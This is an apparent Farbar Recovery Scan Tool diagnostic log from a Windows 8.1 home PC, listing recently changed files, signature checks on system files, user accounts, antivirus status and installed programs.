2015-11-08 07:09 - 2015-11-08 07:09 - 00000000 ____D C:\Users\Holden\AppData\Local\NPE
2015-11-06 20:06 - 2015-11-07 20:16 - 00093562 _____ C:\windows\WindowsUpdate.log
2015-11-05 11:00 - 2015-11-05 11:00 - 00000000 ____D C:\ProgramData\GlarySoft
2015-10-31 07:28 - 2015-10-31 07:28 - 00000000 ____D C:\Users\Holden\AppData\Roaming\WinBatch
2015-10-29 18:10 - 2015-10-29 18:10 - 08769024 _____ C:\Users\Holden\Desktop\Rock Solid BuildersNew. (Portable).QBM
2015-10-28 15:38 - 2015-10-28 15:38 - 15326456 _____ C:\Users\Holden\Downloads\Glary_Utilities_v5.37.0.57.exe
2015-10-28 15:37 - 2015-10-28 15:38 - 15316104 _____ C:\Users\Holden\Downloads\Glary_Utilities_v5.36.0.56.exe
2015-10-20 12:37 - 2015-10-22 17:00 - 00000000 ____D C:\Users\Holden\Desktop\Diamond USA 12U Roster - Copy
2015-10-20 12:37 - 2015-10-20 12:37 - 00000000 ____D C:\Users\Holden\Desktop\Diamond USA 12U Roster
2015-10-20 07:54 - 2015-10-20 07:54 - 00000190 _____ C:\Users\Holden\Downloads\example_roster.csv
2015-10-20 07:50 - 2015-11-05 10:21 - 00490922 _____ C:\Users\Holden\Documents\Diamond USA 12U Roster(xps).xps
2015-10-20 06:56 - 2015-11-06 07:20 - 00000000 ____D C:\Users\Holden\Documents\2016 Diamond Baseball
2015-10-15 10:25 - 2015-10-15 10:25 - 00001402 _____ C:\Users\Holden\Desktop\Chess Openings Wizard.lnk
2015-10-15 10:25 - 2015-10-15 10:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bookup
2015-10-15 10:25 - 2015-10-15 10:25 - 00000000 ____D C:\Program Files (x86)\Bookup
2015-10-15 10:24 - 2015-10-15 10:24 - 33952544 _____ (Bookup Corp. ) C:\Users\Holden\Downloads\ChessOpeningsWizardProfessionalSetup (3).exe
2015-10-15 10:23 - 2015-10-15 10:23 - 33952544 _____ (Bookup Corp. ) C:\Users\Holden\Downloads\ChessOpeningsWizardProfessionalSetup (2).exe
2015-10-15 07:48 - 2015-09-18 22:18 - 00035384 _____ (Microsoft Corporation) C:\windows\system32\CompatTelRunner.exe
2015-10-15 07:48 - 2015-09-18 08:42 - 01290752 _____ (Microsoft Corporation) C:\windows\system32\appraiser.dll
2015-10-15 07:48 - 2015-09-18 08:42 - 01163776 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2015-10-15 07:48 - 2015-09-18 08:42 - 00766464 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2015-10-15 07:48 - 2015-09-18 08:42 - 00699904 _____ (Microsoft Corporation) C:\windows\system32\invagent.dll
2015-10-15 07:48 - 2015-09-18 08:42 - 00503296 _____ (Microsoft Corporation) C:\windows\system32\devinv.dll
2015-10-15 07:48 - 2015-09-18 08:42 - 00073216 _____ (Microsoft Corporation) C:\windows\system32\acmigration.dll
2015-10-14 07:45 - 2015-08-07 16:40 - 01134752 _____ (Microsoft Corporation) C:\windows\system32\KernelBase.dll
2015-10-14 07:45 - 2015-08-07 16:40 - 00686960 _____ (Microsoft Corporation) C:\windows\system32\advapi32.dll
2015-10-14 07:45 - 2015-08-07 16:40 - 00507176 _____ (Microsoft Corporation) C:\windows\SysWOW64\advapi32.dll
2015-10-14 07:45 - 2015-08-07 09:13 - 00862720 _____ (Microsoft Corporation) C:\windows\SysWOW64\KernelBase.dll
2015-10-14 07:45 - 2015-08-06 11:47 - 04710400 _____ (Microsoft Corporation) C:\windows\system32\d2d1.dll
2015-10-14 07:45 - 2015-08-06 11:18 - 04068352 _____ (Microsoft Corporation) C:\windows\SysWOW64\d2d1.dll
2015-10-14 07:44 - 2015-09-29 07:31 - 07457624 _____ (Microsoft Corporation) C:\windows\system32\ntoskrnl.exe
2015-10-14 07:44 - 2015-09-29 07:31 - 01658536 _____ (Microsoft Corporation) C:\windows\system32\winload.efi
2015-10-14 07:44 - 2015-09-29 07:31 - 01519592 _____ (Microsoft Corporation) C:\windows\system32\winload.exe
2015-10-14 07:44 - 2015-09-29 07:31 - 01487008 _____ (Microsoft Corporation) C:\windows\system32\winresume.efi
2015-10-14 07:44 - 2015-09-29 07:31 - 01355848 _____ (Microsoft Corporation) C:\windows\system32\winresume.exe
2015-10-14 07:44 - 2015-09-29 07:29 - 00136904 _____ (Microsoft Corporation) C:\windows\system32\wuauclt.exe
2015-10-14 07:44 - 2015-09-28 13:45 - 03705344 _____ (Microsoft Corporation) C:\windows\system32\wuaueng.dll
2015-10-14 07:44 - 2015-09-28 13:26 - 00409088 _____ (Microsoft Corporation) C:\windows\system32\WUSettingsProvider.dll
2015-10-14 07:44 - 2015-09-28 13:25 - 00140288 _____ (Microsoft Corporation) C:\windows\system32\wuwebv.dll
2015-10-14 07:44 - 2015-09-28 13:25 - 00095744 _____ (Microsoft Corporation) C:\windows\system32\wudriver.dll
2015-10-14 07:44 - 2015-09-28 13:25 - 00035840 _____ (Microsoft Corporation) C:\windows\system32\wuapp.exe
2015-10-14 07:44 - 2015-09-28 13:22 - 00124928 _____ (Microsoft Corporation) C:\windows\SysWOW64\wuwebv.dll
2015-10-14 07:44 - 2015-09-28 13:22 - 00081920 _____ (Microsoft Corporation) C:\windows\SysWOW64\wudriver.dll
2015-10-14 07:44 - 2015-09-28 13:22 - 00029696 _____ (Microsoft Corporation) C:\windows\SysWOW64\wuapp.exe
2015-10-14 07:44 - 2015-09-28 13:15 - 02243072 _____ (Microsoft Corporation) C:\windows\system32\wucltux.dll
2015-10-14 07:44 - 2015-09-28 13:13 - 00891904 _____ (Microsoft Corporation) C:\windows\system32\wuapi.dll
2015-10-14 07:44 - 2015-09-28 13:12 - 00721920 _____ (Microsoft Corporation) C:\windows\SysWOW64\wuapi.dll
2015-10-14 07:44 - 2015-09-24 11:42 - 00348672 _____ (Microsoft Corporation) C:\windows\system32\bdesvc.dll
2015-10-14 07:44 - 2015-09-24 11:40 - 00737280 _____ (Microsoft Corporation) C:\windows\system32\fveapi.dll
2015-10-14 07:44 - 2015-09-10 13:02 - 25851392 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2015-10-14 07:44 - 2015-09-10 12:19 - 00585728 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2015-10-14 07:44 - 2015-09-10 12:18 - 02886656 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2015-10-14 07:44 - 2015-09-10 12:18 - 00088064 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2015-10-14 07:44 - 2015-09-10 12:14 - 05990400 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2015-10-14 07:44 - 2015-09-10 12:09 - 20358144 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2015-10-14 07:44 - 2015-09-10 12:06 - 00616960 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2015-10-14 07:44 - 2015-09-10 12:04 - 00817664 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2015-10-14 07:44 - 2015-09-10 11:51 - 00489984 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2015-10-14 07:44 - 2015-09-10 11:39 - 00504832 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll
2015-10-14 07:44 - 2015-09-10 11:37 - 00092160 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2015-10-14 07:44 - 2015-09-10 11:37 - 00064000 _____ (Microsoft Corporation) C:\windows\SysWOW64\MshtmlDac.dll
2015-10-14 07:44 - 2015-09-10 11:35 - 00315392 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2015-10-14 07:44 - 2015-09-10 11:33 - 02279936 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2015-10-14 07:44 - 2015-09-10 11:28 - 01032704 _____ (Microsoft Corporation) C:\windows\system32\inetcomm.dll
2015-10-14 07:44 - 2015-09-10 11:28 - 00480256 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll
2015-10-14 07:44 - 2015-09-10 11:27 - 00663552 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll
2015-10-14 07:44 - 2015-09-10 11:24 - 14456832 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2015-10-14 07:44 - 2015-09-10 11:21 - 00262144 _____ (Microsoft Corporation) C:\windows\system32\webcheck.dll
2015-10-14 07:44 - 2015-09-10 11:19 - 00801280 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2015-10-14 07:44 - 2015-09-10 11:19 - 00720896 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2015-10-14 07:44 - 2015-09-10 11:19 - 00374784 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2015-10-14 07:44 - 2015-09-10 11:17 - 02126336 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2015-10-14 07:44 - 2015-09-10 11:17 - 00416256 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2015-10-14 07:44 - 2015-09-10 11:07 - 00076288 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2015-10-14 07:44 - 2015-09-10 11:05 - 00279040 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2015-10-14 07:44 - 2015-09-10 11:02 - 04527616 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2015-10-14 07:44 - 2015-09-10 11:01 - 00880128 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcomm.dll
2015-10-14 07:44 - 2015-09-10 11:00 - 12853760 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2015-10-14 07:44 - 2015-09-10 10:57 - 02487808 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2015-10-14 07:44 - 2015-09-10 10:57 - 00230400 _____ (Microsoft Corporation) C:\windows\SysWOW64\webcheck.dll
2015-10-14 07:44 - 2015-09-10 10:55 - 02052608 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2015-10-14 07:44 - 2015-09-10 10:55 - 00689152 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2015-10-14 07:44 - 2015-09-10 10:55 - 00327168 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2015-10-14 07:44 - 2015-09-10 10:45 - 01546752 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2015-10-14 07:44 - 2015-09-10 10:34 - 00800768 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2015-10-14 07:44 - 2015-09-10 10:31 - 02011136 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2015-10-14 07:44 - 2015-09-10 10:27 - 01311232 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2015-10-14 07:44 - 2015-09-10 10:26 - 00710144 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieapfltr.dll
2015-10-14 07:44 - 2015-08-26 21:43 - 22372152 _____ (Microsoft Corporation) C:\windows\system32\shell32.dll
2015-10-14 07:44 - 2015-08-26 21:42 - 19795904 _____ (Microsoft Corporation) C:\windows\SysWOW64\shell32.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00901264 _____ (Microsoft Corporation) C:\windows\SysWOW64\ucrtbase.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00066400 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00022368 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00019808 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00017760 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00017760 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00016224 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00015712 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00014176 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00013664 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00012640 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00012640 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00012640 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00012128 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00012128 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:42 - 00012128 _____ (Microsoft Corporation) C:\windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00984448 _____ (Microsoft Corporation) C:\windows\system32\ucrtbase.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00063840 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-private-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00020832 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-math-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00019808 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00017760 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-string-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00017760 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00016224 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00015712 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00014176 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-time-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00013664 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00012640 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-process-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00012640 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00012640 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00012128 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00012128 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2015-10-14 07:44 - 2015-08-22 08:35 - 00012128 _____ (Microsoft Corporation) C:\windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2015-10-14 07:44 - 2015-08-07 16:40 - 01736520 _____ (Microsoft Corporation) C:\windows\system32\ntdll.dll
2015-10-14 07:44 - 2015-08-07 16:40 - 01499920 _____ (Microsoft Corporation) C:\windows\SysWOW64\ntdll.dll
2015-10-14 07:44 - 2015-08-06 12:05 - 00669184 _____ (Microsoft Corporation) C:\windows\system32\hhctrl.ocx
2015-10-14 07:44 - 2015-08-06 11:37 - 00536576 _____ (Microsoft Corporation) C:\windows\SysWOW64\hhctrl.ocx
2015-10-14 07:44 - 2015-07-16 13:58 - 00074752 _____ (Microsoft Corporation) C:\windows\system32\NcdAutoSetup.dll
2015-10-12 11:50 - 2015-10-12 11:50 - 00000000 ____D C:\Users\Holden\AppData\Roaming\Sun
2015-10-12 11:50 - 2015-10-12 11:50 - 00000000 ____D C:\Users\Holden\AppData\LocalLow\Sun
2015-10-12 11:50 - 2015-10-12 11:50 - 00000000 ____D C:\Users\Holden\.oracle_jre_usage
2015-10-12 11:49 - 2015-10-12 11:49 - 00097888 _____ (Oracle Corporation) C:\windows\SysWOW64\WindowsAccessBridge-32.dll
2015-10-12 11:49 - 2015-10-12 11:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2015-10-12 11:49 - 2015-10-12 11:49 - 00000000 ____D C:\Program Files (x86)\Java
2015-10-12 11:48 - 2015-10-12 11:49 - 00000000 ____D C:\ProgramData\Oracle
2015-10-12 11:47 - 2015-10-12 11:47 - 00584288 _____ (Oracle Corporation) C:\Users\Holden\Downloads\chromeinstall-8u60.exe
2015-10-12 11:47 - 2015-10-12 11:47 - 00000000 ____D C:\Users\Holden\AppData\LocalLow\Oracle
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-11-08 07:30 - 2014-11-09 10:23 - 00271360 _____ C:\Users\Holden\Documents\Dell Outlook Contacts.pst
2015-11-08 07:30 - 2014-10-24 09:06 - 00000000 ____D C:\Users\Holden\Documents\Outlook Files
2015-11-08 07:23 - 2014-11-20 07:20 - 00000000 ____D C:\Users\Holden\Desktop\Fidelity Plan
2015-11-08 07:00 - 2015-07-23 10:40 - 00000924 _____ C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-11-08 07:00 - 2013-08-22 10:36 - 00000000 ____D C:\windows\system32\sru
2015-11-07 19:00 - 2015-07-23 10:40 - 00000920 _____ C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-11-06 21:49 - 2014-10-24 20:11 - 00000052 _____ C:\windows\SysWOW64\DOErrors.log
2015-11-06 20:06 - 2013-08-22 10:36 - 00000000 ____D C:\windows\AppReadiness
2015-11-06 18:23 - 2015-02-09 08:35 - 00033792 ___SH C:\Users\Holden\Desktop\Thumbs.db
2015-11-06 09:20 - 2014-10-16 06:43 - 00003598 _____ C:\windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3264377140-702172241-3405489607-1001
2015-11-05 12:38 - 2013-08-24 16:38 - 00891984 _____ C:\windows\system32\PerfStringBackup.INI
2015-11-05 12:37 - 2014-10-25 18:58 - 00000000 ___DO C:\Users\Holden\OneDrive
2015-11-05 12:36 - 2013-08-22 10:36 - 00000000 ____D C:\windows\system32\NDF
2015-11-05 12:34 - 2015-09-06 10:07 - 00000437 _____ C:\windows\system32\Drivers\etc\hosts.ics
2015-11-05 12:34 - 2013-08-22 09:45 - 00000006 ____H C:\windows\Tasks\SA.DAT
2015-11-05 12:34 - 2013-08-22 08:25 - 00524288 ___SH C:\windows\system32\config\BBI
2015-11-05 12:32 - 2015-05-26 17:55 - 00000000 ____D C:\Program Files (x86)\Glary Utilities 5
2015-11-05 12:25 - 2014-10-16 06:38 - 00000000 ____D C:\Users\Holden
2015-11-05 12:24 - 2014-10-26 05:52 - 00000000 ____D C:\Users\Holden\AppData\Local\CrashDumps
2015-11-05 10:23 - 2014-10-16 06:38 - 00000000 ____D C:\Users\Holden\AppData\Local\Packages
2015-10-31 08:13 - 2013-08-22 08:25 - 00262144 ___SH C:\windows\system32\config\ELAM
2015-10-31 08:10 - 2014-10-25 18:26 - 00000354 _____ C:\windows\Tasks\HPCeeScheduleForHolden.job
2015-10-31 07:48 - 2015-03-19 12:31 - 00000000 ____D C:\Users\Holden\Documents\Rock Solid Builders Trial Balances
2015-10-31 07:29 - 2014-07-18 00:20 - 00000000 ____D C:\Program Files (x86)\CyberLink
2015-10-31 07:28 - 2013-09-02 23:57 - 00000000 ____D C:\SWSETUP
2015-10-31 07:27 - 2014-07-18 01:00 - 00000000 ____D C:\windows\Hewlett-Packard
2015-10-30 20:42 - 2014-10-25 18:26 - 00003170 _____ C:\windows\System32\Tasks\HPCeeScheduleForHolden
2015-10-28 15:54 - 2014-10-16 16:31 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-10-28 15:41 - 2015-05-26 17:55 - 00003314 _____ C:\windows\System32\Tasks\GlaryInitialize 5
2015-10-28 15:41 - 2015-05-26 17:55 - 00002974 _____ C:\windows\System32\Tasks\GU5SkipUAC
2015-10-28 15:41 - 2015-05-26 17:55 - 00001071 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2015-10-20 14:01 - 2013-08-22 10:20 - 00000000 ____D C:\windows\CbsTemp
2015-10-15 23:51 - 2015-07-17 08:49 - 00810488 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerApp.exe
2015-10-15 23:51 - 2015-07-17 08:49 - 00176632 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-10-15 10:31 - 2014-12-10 21:01 - 00000000 ____D C:\windows\system32\appraiser
2015-10-15 10:31 - 2014-10-28 07:01 - 00000000 ___SD C:\windows\system32\CompatTel
2015-10-15 04:51 - 2013-08-22 10:36 - 00000000 ____D C:\windows\rescache
2015-10-14 09:40 - 2013-08-22 10:36 - 00000000 ___RD C:\windows\ToastData
2015-10-14 09:38 - 2015-03-15 19:24 - 00000000 ____D C:\2014 PDF Tax Files
2015-10-14 09:05 - 2014-12-04 09:07 - 00000000 ____D C:\Users\Holden\Documents\TurboTax
2015-10-14 08:40 - 2014-10-24 07:18 - 00000000 ____D C:\windows\system32\MRT
2015-10-14 08:36 - 2014-10-24 07:18 - 143481208 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
 
==================== Files in the root of some directories =======
 
2014-10-25 11:09 - 2014-10-25 11:09 - 0037709 _____ () C:\Users\Holden\AppData\Roaming\Comma Separated Values.ADR
2014-12-04 09:07 - 2015-03-02 15:33 - 0000614 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\explorer.exe => File is digitally signed
C:\windows\SysWOW64\explorer.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\SysWOW64\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\SysWOW64\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\SysWOW64\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\dnsapi.dll => File is digitally signed
C:\windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-10-31 04:33
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:07-11-2015
Ran by Holden (2015-11-08 07:38:29)
Running from C:\Users\Holden\Desktop\FRST64
Windows 8.1 (X64) (2014-10-16 11:38:10)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3264377140-702172241-3405489607-500 - Administrator - Disabled)
Guest (S-1-5-21-3264377140-702172241-3405489607-501 - Limited - Disabled)
Holden (S-1-5-21-3264377140-702172241-3405489607-1001 - Administrator - Enabled) => C:\Users\Holden
HomeGroupUser$ (S-1-5-21-3264377140-702172241-3405489607-1004 - Limited - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Security Suite (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security Suite (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security Suite (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 15.05 beta x64 (HKLM\...\7-Zip) (Version:  - )
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Alcor Micro USB Card Reader Driver  (HKLM-x32\...\AmUStor) (Version: 20.21.3317.03861 - Alcor Micro Corp.)
Alcor Micro USB Card Reader Driver  (x32 Version: 20.21.3317.03861 - Alcor Micro Corp.) Hidden
AMD Catalyst Install Manager (HKLM\...\{B38CC495-7657-3D5A-80C2-8D6E0ED8E638}) (Version: 8.0.915.0 - Advanced Micro Devices, Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Canon IJ Network Scan Utility (HKLM-x32\...\Canon_IJ_Network_Scan_UTILITY) (Version:  - )
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM-x32\...\MP Navigator EX 3.1) (Version:  - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Canon MX870 series User Registration (HKLM-x32\...\Canon MX870 series User Registration) (Version:  - )
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version:  - )
Canon Utilities My Printer (HKLM-x32\...\CanonMyPrinter) (Version:  - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version:  - )
Chess Openings Wizard - Professional build 54 (HKLM-x32\...\ChessOpeningsWizardProfessional_is1) (Version:  - Mike Leahy, Bookup)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.1.3) (Version: 5.0.1.3 - Coupons.com Incorporated)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.5.6805 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.5.3103 - CyberLink Corp.)
Cyberlink PhotoDirector (HKLM-x32\...\InstallShield_{39337565-330E-4ab6-A9AE-AC81E0720B10}) (Version: 3.0.3.4608 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.5.3215 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.5.3215 - CyberLink Corp.)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.2.3212 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
G4FON Koch Method Morse Trainer (HKLM-x32\...\G4FON Koch Method Morse Trainer) (Version:  - )
Glary Utilities 5.37 (HKLM-x32\...\Glary Utilities 5) (Version: 5.37.0.57 - Glarysoft Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 46.0.2490.80 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Connected Music (Meridian - installer) (HKLM-x32\...\StartHPConnectedMusic) (Version: 1.0 - Meridian Audio Ltd)
HP Connected Music (Meridian - player) (HKU\S-1-5-21-3264377140-702172241-3405489607-1001\...\HPConnectedMusic) (Version: 1.1 (build 128) hp - Meridian Audio Ltd)
HP Documentation (HKLM-x32\...\{06600E94-1C34-40E2-AB09-D30AECF78172}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7127.4628 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.00.51 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{390AD982-A331-4D4F-AFD1-64005BC7C99D}) (Version: 7.3.35.12 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 13.00.0000 - Hewlett-Packard)
